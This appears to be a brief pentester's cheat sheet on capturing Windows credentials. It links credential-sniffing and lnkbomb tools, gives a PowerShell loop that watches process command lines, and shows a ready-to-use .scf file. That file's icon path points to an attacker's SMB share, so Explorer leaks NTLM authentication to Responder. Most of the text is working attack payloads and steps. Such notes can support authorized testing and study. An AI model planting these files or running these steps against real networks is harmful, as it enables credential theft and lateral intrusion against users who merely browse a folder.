To sniff creds on a live interace or from a pcap file: https://github.com/DanMcInerney/net-creds
Sniff command executions:
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
A SCF (Shell Command File) is used by Win Explorer to move up and down directories, show the desktop etc.
An SCF can be manipulated to have the icon file location point to a specific UNC path and have Win Epxlorer start an SMB session.
Exemple:
[Shell]
Command=2
IconFile=\\\\10.10.15.37\\share\\legit.ico
[Taskbar]
Command=ToggleDesktop
Name this file @Inventory.scf (@ to force the file to be read first in folder)
Then, running responder on the attacker, we’ll see NTLM auth.
<aside> 💡
SCF don’t work from Server 2019.
We can use .lnk
</aside>
https://github.com/dievus/lnkbomb
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943